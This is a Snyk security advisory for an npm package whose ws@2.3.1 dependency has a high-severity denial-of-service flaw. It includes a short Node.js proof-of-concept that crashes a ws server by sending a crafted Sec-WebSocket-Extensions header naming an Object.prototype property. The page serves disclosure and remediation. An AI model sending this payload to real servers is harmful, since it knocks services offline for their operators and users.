@splytech-io/splyt-ws-connection@0.2.5

Splyt API connection handler.
Vulnerabilities 1 via 1 paths
Dependencies 78
Source npm

Snyk continuously finds and fixes vulnerabilities in your dependencies.

Filter by issue type
  • 1
Filter by issue policy
  • 0
  • 0
high severity

Denial of Service (DoS)

  • Vulnerable module: ws
  • Introduced through: ws@2.3.1

Detailed paths

  • Introduced through: @splytech-io/splyt-ws-connection@0.2.5 ws@2.3.1
    Remediation: Upgrade to ws@3.3.1.

Overview

ws is a simple to use websocket client, server and console for node.js.

Affected versions of the package are vulnerable to Denial of Service (DoS) attacks. A specially crafted value of the Sec-WebSocket-Extensions header that used Object.prototype property names as extension or parameter names could be used to make a ws server crash.

PoC:

const WebSocket = require('ws');
        const net = require('net');
        
        const wss = new WebSocket.Server({ port: 3000 }, function () {
          const payload = 'constructor';  // or ',;constructor'
        
          const request = [
            'GET / HTTP/1.1',
            'Connection: Upgrade',
            'Sec-WebSocket-Key: test',
            'Sec-WebSocket-Version: 8',
            `Sec-WebSocket-Extensions: ${payload}`,
            'Upgrade: websocket',
            '\r\n'
          ].join('\r\n');
        
          const socket = net.connect(3000, function () {
            socket.resume();
            socket.write(request);
          });
        });
        

Remediation

Upgrade ws to version 1.1.5, 3.3.1 or higher.

References